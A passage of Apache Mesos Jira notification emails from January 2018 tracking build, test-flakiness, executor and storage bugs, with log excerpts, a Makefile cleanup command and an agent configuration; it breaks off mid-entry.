[jira] [Assigned] (MESOS-8477) Make clean fails without Python artifacts.

2018-01-22 Thread Till Toenshoff (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8477?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Till Toenshoff reassigned MESOS-8477:
-

Assignee: Till Toenshoff

> Make clean fails without Python artifacts.
> --
>
> Key: MESOS-8477
> URL: https://issues.apache.org/jira/browse/MESOS-8477
> Project: Mesos
>  Issue Type: Bug
>  Components: build
>Affects Versions: 1.5.0
>Reporter: Till Toenshoff
>Assignee: Till Toenshoff
>Priority: Major
>
> Make clean may fail if there are no Python artifacts created by previous 
> builds.  
> {noformat}
> $ make clean{noformat}
> {noformat}
> [...]
> rm -rf java/target
> rm -f examples/java/*.class
> rm -f java/jni/org_apache_mesos*.h
> find python \( -name "build" -o -name "dist" -o -name "*.pyc" \
>   -o -name "*.egg-info" \) -exec rm -rf '{}' \+
> find: ‘python’: No such file or directory
> make[1]: *** [clean-python] Error 1
> make[1]: Leaving directory `/home/centos/workspace/mesos/build/src'
> make: *** [clean-recursive] Error 1{noformat}
>  
> Triggered by 
> [https://github.com/apache/mesos/blob/62d392704c499e06da0323e50dfd016cdac06f33/src/Makefile.am#L2218-L2219]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8477) Make clean fails without Python artifacts.

2018-01-22 Thread Till Toenshoff (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8477?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16335366#comment-16335366
 ] 

Till Toenshoff commented on MESOS-8477:
---

Prefixing that {{find}} with a dash to make any failure non-fatal might do the 
trick here.
{noformat}
-find python \( -name "build" -o -name "dist" -o -name "*.pyc" -o -name 
"*.egg-info" \) -exec rm -rf '{}' \+{noformat}

> Make clean fails without Python artifacts.
> --
>
> Key: MESOS-8477
> URL: https://issues.apache.org/jira/browse/MESOS-8477
> Project: Mesos
>  Issue Type: Bug
>  Components: build
>Affects Versions: 1.5.0
>Reporter: Till Toenshoff
>Priority: Major
>
> Make clean may fail if there are no Python artifacts created by previous 
> builds.  
> {noformat}
> $ make clean{noformat}
> {noformat}
> [...]
> rm -rf java/target
> rm -f examples/java/*.class
> rm -f java/jni/org_apache_mesos*.h
> find python \( -name "build" -o -name "dist" -o -name "*.pyc" \
>   -o -name "*.egg-info" \) -exec rm -rf '{}' \+
> find: ‘python’: No such file or directory
> make[1]: *** [clean-python] Error 1
> make[1]: Leaving directory `/home/centos/workspace/mesos/build/src'
> make: *** [clean-recursive] Error 1{noformat}
>  
> Triggered by 
> [https://github.com/apache/mesos/blob/62d392704c499e06da0323e50dfd016cdac06f33/src/Makefile.am#L2218-L2219]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8477) Make clean fails without Python artifacts.

2018-01-22 Thread Till Toenshoff (JIRA)
Till Toenshoff created MESOS-8477:
-

 Summary: Make clean fails without Python artifacts.
 Key: MESOS-8477
 URL: https://issues.apache.org/jira/browse/MESOS-8477
 Project: Mesos
  Issue Type: Bug
  Components: build
Affects Versions: 1.5.0
Reporter: Till Toenshoff


Make clean may fail if there are no Python artifacts created by previous 
builds.  
{noformat}
$ make clean{noformat}
{noformat}
[...]
rm -rf java/target
rm -f examples/java/*.class
rm -f java/jni/org_apache_mesos*.h
find python \( -name "build" -o -name "dist" -o -name "*.pyc"   \
  -o -name "*.egg-info" \) -exec rm -rf '{}' \+
find: ‘python’: No such file or directory
make[1]: *** [clean-python] Error 1
make[1]: Leaving directory `/home/centos/workspace/mesos/build/src'
make: *** [clean-recursive] Error 1{noformat}
 

Triggered by 
[https://github.com/apache/mesos/blob/62d392704c499e06da0323e50dfd016cdac06f33/src/Makefile.am#L2218-L2219]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8389) Notion of "removable" task in master code is inaccurate.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8389?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler reassigned MESOS-8389:
--

Assignee: Benjamin Mahler

> Notion of "removable" task in master code is inaccurate.
> 
>
> Key: MESOS-8389
> URL: https://issues.apache.org/jira/browse/MESOS-8389
> Project: Mesos
>  Issue Type: Improvement
>  Components: master
>Reporter: Benjamin Mahler
>Assignee: Benjamin Mahler
>Priority: Major
>
> In the past, the notion of a "removable" task meant: the task is terminal and 
> acknowledged. It appears now that a removable task is defined purely by its 
> state (terminal or unreachable) but not whether the terminal update is 
> acknowledged.
> As a result, the code that is calling this function ({{isRemovable}}) ends up 
> being unintuitive. One example of a confusing piece of code is within 
> {{updateTask}}. Here, we have logic which says, if the task is removable, 
> recover the resources *but don't remove it*. This seems more intuitive if 
> directly described as: "if the task is no longer consuming resources, then 
> (e.g. transitioned to terminal or unreachable) then recover the resources".
> If one looks up the documentation of {{isRemovable}}, it says "When a task 
> becomes removable, it is erased from the master's primary task data 
> structures", but that isn't accurate since this function doesn't say whether 
> the terminal task has been acknowledged, which is required for a task to be 
> removable.
> I think an easy improvement here would be to move this notion of removable 
> towards something like {{isTerminalOrUnreachable}}. We could also think about 
> how to name this concept more generally, like {{canReleaseResources}} to 
> describe whether the task's resources are considered allocated.
> If we do introduce a notion of {{isRemovable}}, it seems it should be saying 
> whether the task could be removed from the master, which includes checking 
> that terminal tasks have been acknowledged.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Qian Zhang updated MESOS-8305:
--
Target Version/s: 1.6.0

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 has been committed and likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16335310#comment-16335310
 ] 

Qian Zhang commented on MESOS-8305:
---

RR: https://reviews.apache.org/r/65278/

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 has been committed and likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8411) Killing a queued task can lead to the command executor never terminating.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8411?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8411:
---
Target Version/s: 1.4.2, 1.6.0, 1.5.1, 1.3.3  (was: 1.6.0)

> Killing a queued task can lead to the command executor never terminating.
> -
>
> Key: MESOS-8411
> URL: https://issues.apache.org/jira/browse/MESOS-8411
> Project: Mesos
>  Issue Type: Bug
>  Components: agent
>Affects Versions: 1.3.1, 1.4.1
>Reporter: Benjamin Mahler
>Assignee: Meng Zhu
>Priority: Critical
>
> If a task is killed while the executor is re-registering, we will remove it 
> from queued tasks and shut down the executor if all the its initial tasks 
> could not be delivered. However, there is a case (within {{Slave::___run}}) 
> where we leave the executor running, the race is:
> # Command-executor task launched.
> # Command executor sends registration message. Agent tells containerizer to 
> update the resources before it sends the tasks to the executor.
> # Kill arrives, and we synchronously remove the task from queued tasks.
> # Containerizer finishes updating the resources, and in {{Slave::___run}} the 
> killed task is ignored.
> # Command executor stays running!
> Executors could have a timeout to handle this case, but it's not clear that 
> all executors will implement this correctly. It would be better to have a 
> defensive policy that will shut down an executor if all of its initial batch 
> of tasks were killed prior to delivery.
> In order to implement this, one approach discussed with [~vinodkone] is to 
> look at the running + terminated but unacked + completed tasks, and if empty, 
> shut the executor down in the {{Slave::___run}} path. This will require us to 
> check that the completed task cache size is set to at least 1, and this also 
> assumes that the completed tasks are not cleared based on time or during 
> agent recovery.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8411) Killing a queued task can lead to the command executor never terminating.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8411?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8411:
---
Affects Version/s: (was: 1.3.0)
   1.3.1
   1.4.1

> Killing a queued task can lead to the command executor never terminating.
> -
>
> Key: MESOS-8411
> URL: https://issues.apache.org/jira/browse/MESOS-8411
> Project: Mesos
>  Issue Type: Bug
>  Components: agent
>Affects Versions: 1.3.1, 1.4.1
>Reporter: Benjamin Mahler
>Assignee: Meng Zhu
>Priority: Critical
>
> If a task is killed while the executor is re-registering, we will remove it 
> from queued tasks and shut down the executor if all the its initial tasks 
> could not be delivered. However, there is a case (within {{Slave::___run}}) 
> where we leave the executor running, the race is:
> # Command-executor task launched.
> # Command executor sends registration message. Agent tells containerizer to 
> update the resources before it sends the tasks to the executor.
> # Kill arrives, and we synchronously remove the task from queued tasks.
> # Containerizer finishes updating the resources, and in {{Slave::___run}} the 
> killed task is ignored.
> # Command executor stays running!
> Executors could have a timeout to handle this case, but it's not clear that 
> all executors will implement this correctly. It would be better to have a 
> defensive policy that will shut down an executor if all of its initial batch 
> of tasks were killed prior to delivery.
> In order to implement this, one approach discussed with [~vinodkone] is to 
> look at the running + terminated but unacked + completed tasks, and if empty, 
> shut the executor down in the {{Slave::___run}} path. This will require us to 
> check that the completed task cache size is set to at least 1, and this also 
> assumes that the completed tasks are not cleared based on time or during 
> agent recovery.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6812) Invalid entries in /proc/self/mountinfo when using persistent storage

2018-01-22 Thread Jie Yu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6812?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16335241#comment-16335241
 ] 

Jie Yu commented on MESOS-6812:
---

Hum, that sounds like a kernel issue or systemd issue? Do you know why the 
systemd complains about the mount table? It looks fine to me.

> Invalid entries in /proc/self/mountinfo when using persistent storage
> -
>
> Key: MESOS-6812
> URL: https://issues.apache.org/jira/browse/MESOS-6812
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.0.1, 1.4.0
>Reporter: Mateusz Moneta
>Priority: Minor
>
> Hello,
> we use Mesos 1.0.1 on Debian Jessie with Kernel {{4.6.1-1~bpo8+1 
> (2016-06-14)}} and Docker 1.12.5.
> We have the problem that on slaves which run tasks with persistent storages 
> Mesos adds invalid entries to {{/proc/self/mountinfo}}. Example:
> {noformat}
> 79 46 253:5 
> /lib/mesos/volumes/roles/slave/services_proxy_production_mongo#data#4d7ae497-a0f5-11e6-8a4f-e0db55fde00f
>  
> /var/lib/mesos/slaves/56e2e372-da8e-47d0-ac25-0f55945c625c-S2/frameworks/fa8eb417-29e3-4640-9405-ab84d2ef9794-0001/executors/services_proxy_production_mongo.4d7ae498-a0f5-11e6-8a4f-e0db55fde00f/runs/f84f2541-7e44-4226-80c6-93f438e50fd5/data
>  rw,relatime shared:28 - ext4 /dev/mapper/main-var rw,data=ordered
> {noformat}
> This causes many {noformat}
> Dec 19 13:56:49 s10.mesos.services.ams.osa systemd[1]: Failed to reread 
> /proc/self/mountinfo: Invalid argument
> {noformat} errors in {{/var/log/daemon.log}}.
> Mesos slave configuration:
> {noformat}
> ULIMIT="-n 8192"
> CLUSTER=services
> MASTER=`cat /etc/mesos/zk`
> MESOS_CONTAINERIZERS=docker,mesos
> MESOS_EXECUTOR_REGISTRATION_TIMEOUT=5mins
> MESOS_CREDENTIAL=/etc/mesos.credentials
> MESOS_WORK_DIR=/var/lib/mesos
> MESOS_PORT=8080
> MESOS_EXECUTOR_ENVIRONMENT_VARIABLES='{"SSL_ENABLED": "true","SSL_KEY_FILE": 
> "/etc/ssl/certs/star.mesos.services.ams.osa.key", "SSL_CERT_FILE": 
> "/etc/ssl/certs/star.mesos.services.ams.osa.pem"}'
> MESOS_MODULES=file:///usr/etc/mesos/mesos-slave-modules.json
> MESOS_CONTAINER_LOGGER=org_apache_mesos_LogrotateContainerLogger
> MESOS_LOGGING_LEVEL=INFO
> LIBPROCESS_SSL_ENABLED=true
> LIBPROCESS_SSL_KEY_FILE=/etc/ssl/certs/star.mesos.services.ams.osa.key
> LIBPROCESS_SSL_CERT_FILE=/etc/ssl/certs/star.mesos.services.ams.osa.pem
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8476) Store executor container status in the agent after it launches.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8476?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8476:
---
Environment: (was: Currently, the agent will retrieve the container 
status upon on each task status update in order to augment the status update 
with the container status information (e.g. ip address). This has made the 
status update processing asynchronous when it comes to the side effects to the 
agent data structures. Consequently, several bugs have occurred: MESOS-5380, 
MESOS-7865, MESOS-8459.

It's odd that the container status, which seems to define the properties of the 
executor's container, needs to be retrieved in the status update path. Rather, 
the agent could just store this once when the executor is launched and remember 
it.

Currently, the containerizer interface exposes the container status only as a 
separate call. However, to simplify the fix here, the containerizer could 
expose it directly in the {{launch()}} Future.)

> Store executor container status in the agent after it launches.
> ---
>
> Key: MESOS-8476
> URL: https://issues.apache.org/jira/browse/MESOS-8476
> Project: Mesos
>  Issue Type: Improvement
>  Components: agent, containerization
>Reporter: Benjamin Mahler
>Priority: Major
>
> Currently, the agent will retrieve the container status upon on each task 
> status update in order to augment the status update with the container status 
> information (e.g. ip address). This has made the status update processing 
> asynchronous when it comes to the side effects to the agent data structures. 
> Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, MESOS-8459.
> It's odd that the container status, which seems to define the properties of 
> the executor's container, needs to be retrieved in the status update path. 
> Rather, the agent could just store this once when the executor is launched 
> and remember it.
> Currently, the containerizer interface exposes the container status only as a 
> separate call. However, to simplify the fix here, the containerizer could 
> expose it directly in the {{launch()}} Future.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8476) Store executor container status in the agent after it launches.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8476?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8476:
---
Description: 
Currently, the agent will retrieve the container status upon on each task 
status update in order to augment the status update with the container status 
information (e.g. ip address). This has made the status update processing 
asynchronous when it comes to the side effects to the agent data structures. 
Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, MESOS-8459.

It's odd that the container status, which seems to define the properties of the 
executor's container, needs to be retrieved in the status update path. Rather, 
the agent could just store this once when the executor is launched and remember 
it.

Currently, the containerizer interface exposes the container status only as a 
separate call. However, to simplify the fix here, the containerizer could 
expose it directly in the {{launch()}} Future.

> Store executor container status in the agent after it launches.
> ---
>
> Key: MESOS-8476
> URL: https://issues.apache.org/jira/browse/MESOS-8476
> Project: Mesos
>  Issue Type: Improvement
>  Components: agent, containerization
> Environment: Currently, the agent will retrieve the container status 
> upon on each task status update in order to augment the status update with 
> the container status information (e.g. ip address). This has made the status 
> update processing asynchronous when it comes to the side effects to the agent 
> data structures. Consequently, several bugs have occurred: MESOS-5380, 
> MESOS-7865, MESOS-8459.
> It's odd that the container status, which seems to define the properties of 
> the executor's container, needs to be retrieved in the status update path. 
> Rather, the agent could just store this once when the executor is launched 
> and remember it.
> Currently, the containerizer interface exposes the container status only as a 
> separate call. However, to simplify the fix here, the containerizer could 
> expose it directly in the {{launch()}} Future.
>Reporter: Benjamin Mahler
>Priority: Major
>
> Currently, the agent will retrieve the container status upon on each task 
> status update in order to augment the status update with the container status 
> information (e.g. ip address). This has made the status update processing 
> asynchronous when it comes to the side effects to the agent data structures. 
> Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, MESOS-8459.
> It's odd that the container status, which seems to define the properties of 
> the executor's container, needs to be retrieved in the status update path. 
> Rather, the agent could just store this once when the executor is launched 
> and remember it.
> Currently, the containerizer interface exposes the container status only as a 
> separate call. However, to simplify the fix here, the containerizer could 
> expose it directly in the {{launch()}} Future.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8476) Store executor container status in the agent after it launches.

2018-01-22 Thread Benjamin Mahler (JIRA)
Benjamin Mahler created MESOS-8476:
--

 Summary: Store executor container status in the agent after it 
launches.
 Key: MESOS-8476
 URL: https://issues.apache.org/jira/browse/MESOS-8476
 Project: Mesos
  Issue Type: Improvement
  Components: agent, containerization
 Environment: Currently, the agent will retrieve the container status 
upon on each task status update in order to augment the status update with the 
container status information (e.g. ip address). This has made the status update 
processing asynchronous when it comes to the side effects to the agent data 
structures. Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, 
MESOS-8459.

It's odd that the container status, which seems to define the properties of the 
executor's container, needs to be retrieved in the status update path. Rather, 
the agent could just store this once when the executor is launched and remember 
it.

Currently, the containerizer interface exposes the container status only as a 
separate call. However, to simplify the fix here, the containerizer could 
expose it directly in the {{launch()}} Future.
Reporter: Benjamin Mahler






--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8475) Event-specific overloads for 'Master::Subscribers::Subscriber::send()'

2018-01-22 Thread Greg Mann (JIRA)
Greg Mann created MESOS-8475:


 Summary: Event-specific overloads for 
'Master::Subscribers::Subscriber::send()'
 Key: MESOS-8475
 URL: https://issues.apache.org/jira/browse/MESOS-8475
 Project: Mesos
  Issue Type: Improvement
Reporter: Greg Mann


The code could be more efficient and more readable if we introduce 
event-specific overloads for the {{Master::Subscribers::Subscriber::send()}} 
method.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8184) Implement master's AcknowledgeOfferOperationMessage handler.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8184?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman updated MESOS-8184:
--
Sprint: Mesosphere Sprint 68, Mesosphere Sprint 69, Mesosphere Sprint 70, 
Mesosphere Sprint 73  (was: Mesosphere Sprint 68, Mesosphere Sprint 69, 
Mesosphere Sprint 70)

> Implement master's AcknowledgeOfferOperationMessage handler.
> 
>
> Key: MESOS-8184
> URL: https://issues.apache.org/jira/browse/MESOS-8184
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Gastón Kleiman
>Priority: Major
>  Labels: mesosphere
>
> This handler should validate the message and forward it to the corresponding 
> agent/ERP.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8468) `LAUNCH_GROUP` failure tears down the default executor.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8468?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman updated MESOS-8468:
--
Story Points: 5

> `LAUNCH_GROUP` failure tears down the default executor.
> ---
>
> Key: MESOS-8468
> URL: https://issues.apache.org/jira/browse/MESOS-8468
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0, 1.3.0, 1.4.0, 1.5.0
>Reporter: Chun-Hung Hsiao
>Assignee: Gastón Kleiman
>Priority: Critical
>  Labels: default-executor, mesosphere
>
> The following code in the default executor 
> (https://github.com/apache/mesos/blob/12be4ba002f2f5ff314fbc16af51d095b0d90e56/src/launcher/default_executor.cpp#L525-L535)
>  shows that if a `LAUNCH_NESTED_CONTAINER` call is failed (say, due to a 
> fetcher failure), the whole executor will be shut down:
> {code:cpp}
> // Check if we received a 200 OK response for all the
> // `LAUNCH_NESTED_CONTAINER` calls. Shutdown the executor
> // if this is not the case.
> foreach (const Response& response, responses.get()) {
>   if (response.code != process::http::Status::OK) {
> LOG(ERROR) << "Received '" << response.status << "' ("
><< response.body << ") while launching child container";
> _shutdown();
> return;
>   }
> }
> {code}
> This is not expected by a user. Instead, one would expect that a failed 
> `LAUNCH_GROUP` won't affect other task groups launched by the same executor, 
> similar to the case that a task failure only takes down its own task group. 
> We should adjust the semantics to make a failed `LAUNCH_GROUP` not take down 
> the executor and affect other task groups.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8468) `LAUNCH_GROUP` failure tears down the default executor.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8468?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman updated MESOS-8468:
--
Sprint: Mesosphere Sprint 73

> `LAUNCH_GROUP` failure tears down the default executor.
> ---
>
> Key: MESOS-8468
> URL: https://issues.apache.org/jira/browse/MESOS-8468
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0, 1.3.0, 1.4.0, 1.5.0
>Reporter: Chun-Hung Hsiao
>Assignee: Gastón Kleiman
>Priority: Critical
>  Labels: default-executor, mesosphere
>
> The following code in the default executor 
> (https://github.com/apache/mesos/blob/12be4ba002f2f5ff314fbc16af51d095b0d90e56/src/launcher/default_executor.cpp#L525-L535)
>  shows that if a `LAUNCH_NESTED_CONTAINER` call is failed (say, due to a 
> fetcher failure), the whole executor will be shut down:
> {code:cpp}
> // Check if we received a 200 OK response for all the
> // `LAUNCH_NESTED_CONTAINER` calls. Shutdown the executor
> // if this is not the case.
> foreach (const Response& response, responses.get()) {
>   if (response.code != process::http::Status::OK) {
> LOG(ERROR) << "Received '" << response.status << "' ("
><< response.body << ") while launching child container";
> _shutdown();
> return;
>   }
> }
> {code}
> This is not expected by a user. Instead, one would expect that a failed 
> `LAUNCH_GROUP` won't affect other task groups launched by the same executor, 
> similar to the case that a task failure only takes down its own task group. 
> We should adjust the semantics to make a failed `LAUNCH_GROUP` not take down 
> the executor and affect other task groups.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8468) `LAUNCH_GROUP` failure tears down the default executor.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8468?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman reassigned MESOS-8468:
-

Assignee: Gastón Kleiman

> `LAUNCH_GROUP` failure tears down the default executor.
> ---
>
> Key: MESOS-8468
> URL: https://issues.apache.org/jira/browse/MESOS-8468
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0, 1.3.0, 1.4.0, 1.5.0
>Reporter: Chun-Hung Hsiao
>Assignee: Gastón Kleiman
>Priority: Critical
>  Labels: default-executor, mesosphere
>
> The following code in the default executor 
> (https://github.com/apache/mesos/blob/12be4ba002f2f5ff314fbc16af51d095b0d90e56/src/launcher/default_executor.cpp#L525-L535)
>  shows that if a `LAUNCH_NESTED_CONTAINER` call is failed (say, due to a 
> fetcher failure), the whole executor will be shut down:
> {code:cpp}
> // Check if we received a 200 OK response for all the
> // `LAUNCH_NESTED_CONTAINER` calls. Shutdown the executor
> // if this is not the case.
> foreach (const Response& response, responses.get()) {
>   if (response.code != process::http::Status::OK) {
> LOG(ERROR) << "Received '" << response.status << "' ("
><< response.body << ") while launching child container";
> _shutdown();
> return;
>   }
> }
> {code}
> This is not expected by a user. Instead, one would expect that a failed 
> `LAUNCH_GROUP` won't affect other task groups launched by the same executor, 
> similar to the case that a task failure only takes down its own task group. 
> We should adjust the semantics to make a failed `LAUNCH_GROUP` not take down 
> the executor and affect other task groups.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Chun-Hung Hsiao (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334908#comment-16334908
 ] 

Chun-Hung Hsiao edited comment on MESOS-8474 at 1/22/18 9:16 PM:
-

This is caused by a race that the master may send out an offer between 
{{DESTRY_VOLUME}} and {{DESTROY_BLOCK}}. I'll work on a patch to fix this test, 
possibly by controlling the clock.


was (Author: chhsia0):
This is caused by a race that the master may send out an offer between 
{{DESTRY_VOLUME}} and {DESTROY_BLOCK}}. I'll work on a patch to fix this test, 
possibly by controlling the clock.

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Chun-Hung Hsiao (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334908#comment-16334908
 ] 

Chun-Hung Hsiao commented on MESOS-8474:


This is caused by a race that the master may send out an offer between 
{{DESTRY_VOLUME}} and {DESTROY_BLOCK}}. I'll work on a patch to fix this test, 
possibly by controlling the clock.

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao reassigned MESOS-8474:
--

Assignee: Chun-Hung Hsiao

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

